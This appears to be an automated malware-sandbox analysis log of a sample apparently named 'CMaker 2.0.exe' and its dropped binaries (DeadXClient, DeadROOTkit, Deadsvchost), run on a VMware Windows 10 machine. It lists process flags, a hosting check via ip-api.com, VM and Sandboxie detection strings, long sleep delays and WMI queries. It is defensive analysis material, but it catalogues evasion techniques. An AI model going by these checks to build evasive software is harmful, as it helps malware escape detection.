                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exe; Process information set: NOOPENFILEERRORBOX (34 identical entries)
                        Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX (2 identical entries)
                        Source: C:\Users\Public\Deadsvchost.exe; Process information set: NOOPENFILEERRORBOX (20 identical entries)
                        Source: C:\Windows\System32\wbem\WMIADAP.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIADAP.exe; Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIADAP.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1; Host: ip-api.com; Connection: Keep-Alive
                        Source: C:\Users\Public\DeadXClient.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController (7 identical entries)
                        Source: DeadROOTkit.exe, 00000007.00000002.2316235027.000000000303C000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: SBIEDLL.DLL
                        Source: 1.exe, 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmp; Binary or memory string: SBIEDLL.DLLINFO
                        Source: C:\Users\user\AppData\Local\Temp\1.exe; Memory allocated: 2D00000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\1.exe; Memory allocated: 1AFB0000 memory reserve | memory write watch
                        Source: C:\Users\Public\DeadXClient.exe; Memory allocated: 2D50000 memory reserve | memory write watch
                        Source: C:\Users\Public\DeadXClient.exe; Memory allocated: 1ADE0000 memory reserve | memory write watch
                        Source: C:\Users\Public\DeadROOTkit.exe; Memory allocated: 1510000 memory reserve | memory write watch
                        Source: C:\Users\Public\DeadROOTkit.exe; Memory allocated: 1B030000 memory reserve | memory write watch
                        Source: C:\Users\Public\Deadsvchost.exe; Memory allocated: AA0000 memory reserve | memory write watch
                        Source: C:\Users\Public\Deadsvchost.exe; Memory allocated: 1A590000 memory reserve | memory write watch
                        Source: C:\Users\Public\Deadsvchost.exe; Memory allocated: 1490000 memory reserve | memory write watch
                        Source: C:\Users\Public\Deadsvchost.exe; Memory allocated: 1AEE0000 memory reserve | memory write watch
                        Source: C:\Users\Public\Deadsvchost.exe; Memory allocated: 16D0000 memory reserve | memory write watch
                        Source: C:\Users\Public\Deadsvchost.exe; Memory allocated: 1B090000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\1.exe; Thread delayed: delay time: 922337203685477
                        Source: C:\Users\Public\DeadXClient.exe; Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477 (2 identical entries)
                        Source: C:\Users\Public\Deadsvchost.exe; Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\dllhost.exe; Thread delayed: delay time: 922337203685477
                        Source: C:\Users\Public\Deadsvchost.exe; Thread delayed: delay time: 922337203685477 (2 identical entries)
                        Source: C:\Users\Public\DeadXClient.exe; Window / User API: threadDelayed 5206
                        Source: C:\Users\Public\DeadXClient.exe; Window / User API: threadDelayed 4625
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4234
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4440
                        Source: C:\Windows\System32\dllhost.exe; Window / User API: threadDelayed 488
                        Source: C:\Windows\System32\winlogon.exe; Window / User API: threadDelayed 9986
                        Source: C:\Windows\System32\lsass.exe; Window / User API: threadDelayed 9948
                        Source: C:\Windows\System32\dwm.exe; Window / User API: threadDelayed 9870
                        Source: C:\Windows\System32\wbem\WMIADAP.exe; Window / User API: threadDelayed 1810
                        Source: C:\Windows\System32\wbem\WMIADAP.exe; Window / User API: threadDelayed 834
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\_decimal.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\_hashlib.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\python3.dll
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\_ssl.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\charset_normalizer\md__mypyc.cp311-win_amd64.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\_lzma.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\cryptography\hazmat\bindings\_rust.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\_ctypes.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\charset_normalizer\md.cp311-win_amd64.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\python311.dll
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\_cffi_backend.cp311-win_amd64.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\_socket.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\_bz2.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\_queue.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\unicodedata.pyd
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI48002\select.pyd
                        Source: C:\Users\Public\DeadXClient.exe; Evasive API call chain: RegOpenKey,DecisionNodes,Sleep (graph_6-11240)
                        Source: C:\Users\Public\DeadCodeRootKit.exe; Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe; Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_2-18574)
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe; API coverage: 7.6 %
                        Source: C:\Users\Public\DeadXClient.exe; API coverage: 0.3 %
                        Source: C:\Users\user\AppData\Local\Temp\1.exe TID: 6104; Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\Public\DeadXClient.exe TID: 4836; Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\Public\DeadXClient.exe TID: 5876; Thread sleep count: 5206 > 30
                        Source: C:\Users\Public\DeadXClient.exe TID: 5876; Thread sleep count: 4625 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1220; Thread sleep count: 4234 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1220; Thread sleep count: 4440 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5684; Thread sleep time: -7378697629483816s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3892; Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 4632; Thread sleep count: 72 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 4632; Thread sleep time: -72000s >= -30000s
                        Source: C:\Users\Public\Deadsvchost.exe TID: 6764; Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\dllhost.exe TID: 616; Thread sleep count: 488 > 30
                        Source: C:\Windows\System32\dllhost.exe TID: 616; Thread sleep time: -48800s >= -30000s
                        Source: C:\Windows\System32\dllhost.exe TID: 4832; Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\winlogon.exe TID: 2016; Thread sleep count: 9986 > 30
                        Source: C:\Windows\System32\winlogon.exe TID: 2016; Thread sleep time: -9986000s >= -30000s
                        Source: C:\Windows\System32\lsass.exe TID: 988; Thread sleep count: 9948 > 30
                        Source: C:\Windows\System32\lsass.exe TID: 988; Thread sleep time: -9948000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 6828; Thread sleep count: 262 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 6828; Thread sleep time: -262000s >= -30000s
                        Source: C:\Users\Public\Deadsvchost.exe TID: 3180; Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\dwm.exe TID: 7012; Thread sleep count: 9870 > 30
                        Source: C:\Windows\System32\dwm.exe TID: 7012; Thread sleep time: -9870000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 6452; Thread sleep count: 251 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 6452; Thread sleep time: -251000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 5716; Thread sleep count: 252 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 5716; Thread sleep time: -252000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 5140; Thread sleep count: 240 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 5140; Thread sleep time: -240000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 3816; Thread sleep count: 238 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 3816; Thread sleep time: -238000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 2548; Thread sleep count: 200 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 2548; Thread sleep time: -200000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 6248; Thread sleep count: 250 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 6248; Thread sleep time: -250000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 6408; Thread sleep count: 235 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 6408; Thread sleep time: -235000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 6724; Thread sleep count: 245 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 6724; Thread sleep time: -245000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 2784; Thread sleep count: 249 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 2784; Thread sleep time: -249000s >= -30000s
                        Source: C:\Users\Public\Deadsvchost.exe TID: 640; Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 948; Thread sleep count: 243 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 948; Thread sleep time: -243000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 5072; Thread sleep count: 246 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 5072; Thread sleep time: -246000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 4044; Thread sleep count: 251 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 4044; Thread sleep time: -251000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 4068; Thread sleep count: 119 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 4068; Thread sleep time: -119000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 6852; Thread sleep count: 251 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 6852; Thread sleep time: -251000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 5396; Thread sleep count: 249 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 5396; Thread sleep time: -249000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 1880; Thread sleep count: 251 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 1880; Thread sleep time: -251000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 4160; Thread sleep count: 251 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 4160; Thread sleep time: -251000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 6400; Thread sleep count: 245 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 6400; Thread sleep time: -245000s >= -30000s
                        Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 7000; Thread sleep count: 1810 > 30
                        Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 7000; Thread sleep count: 834 > 30
                        Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 7000; Thread sleep count: 241 > 30
                        Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 7000; Thread sleep count: 154 > 30
                        Source: C:\Users\Public\DeadROOTkit.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
                        Source: C:\Windows\System32\svchost.exe; Last function: Thread delayed (2 identical entries)
                        Source: C:\Windows\System32\dllhost.exe; Last function: Thread delayed (2 identical entries)
                        Source: C:\Windows\System32\lsass.exe; Last function: Thread delayed (2 identical entries)
                        Source: C:\Windows\System32\svchost.exe; Last function: Thread delayed (38 identical entries)
                        Source: C:\Users\Public\DeadXClient.exe; File Volume queried: C:\ FullSizeInformation (9 identical entries)
                        Source: C:\Users\Public\DeadROOTkit.exe; File Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\Public\Deadsvchost.exe; File Volume queried: C:\ FullSizeInformation (3 identical entries)
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe; Code function: 2_2_00007FF6FABE6B80 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe; Code function: 2_2_00007FF6FABE76F0 FindFirstFileExW,FindClose
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe; Code function: 2_2_00007FF6FAC01674 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe; Code function: 5_2_00007FF6FABE76F0 FindFirstFileExW,FindClose
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe; Code function: 5_2_00007FF6FABE6B80 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe; Code function: 5_2_00007FF6FAC01674 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose
                        Source: C:\Users\Public\DeadXClient.exe; Code function: 6_2_1C59BF5C FindFirstFileExW
                        Source: CMaker 2.0.exe, 00000005.00000003.2172273654.0000022D34DCB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2231869727.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171930276.0000022D34DCB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2172905632.0000022D34DCB000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176753865.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175839153.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229086639.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2171387062.0000022D34DCB000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWu
                        Source: CMaker 2.0.exe, 00000002.00000003.2155583586.00000218C017E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
                        Source: dwm.exe, 00000017.00000002.3518000549.000001D156AA0000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000gB
                        Source: svchost.exe, 0000001E.00000000.2403096584.0000022E66A2B000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
                        Source: lsass.exe, 00000014.00000000.2323428537.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: pvmicvssNT SERVICE
                        Source: svchost.exe, 0000001E.00000002.3475897795.0000022E66A43000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: (@vmci
                        Source: svchost.exe, 0000001E.00000000.2404096640.0000022E67512000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: VMware SATA CD00
                        Source: DeadXClient.exe, 00000006.00000002.3500000088.000000001BE30000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWe="5%SystemRoot%\system32\mswsock.dll <section name="roleService" type="System.Web.Configuration.ScriptingRoleServiceSection, System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" requirePermission="false" allowDefinition="MachineToApplication" />
                        Source: svchost.exe, 0000001C.00000002.3501926907.00000200A2218000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
                        Source: svchost.exe, 0000001E.00000000.2404096640.0000022E67512000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: NECVMWarVMware SATA CD00
                        Source: svchost.exe, 0000001E.00000000.2403457523.0000022E67060000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: D8VMwareVirtual disk6000c29c2bea38880a8a16ee9f37bec9
                        Source: svchost.exe, 0000001E.00000000.2404096640.0000022E67512000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                        Source: svchost.exe, 0000001E.00000003.2482259460.0000022E6758D000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
                        Source: svchost.exe, 0000001E.00000003.2483947447.0000022E67B9C000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>Wi(
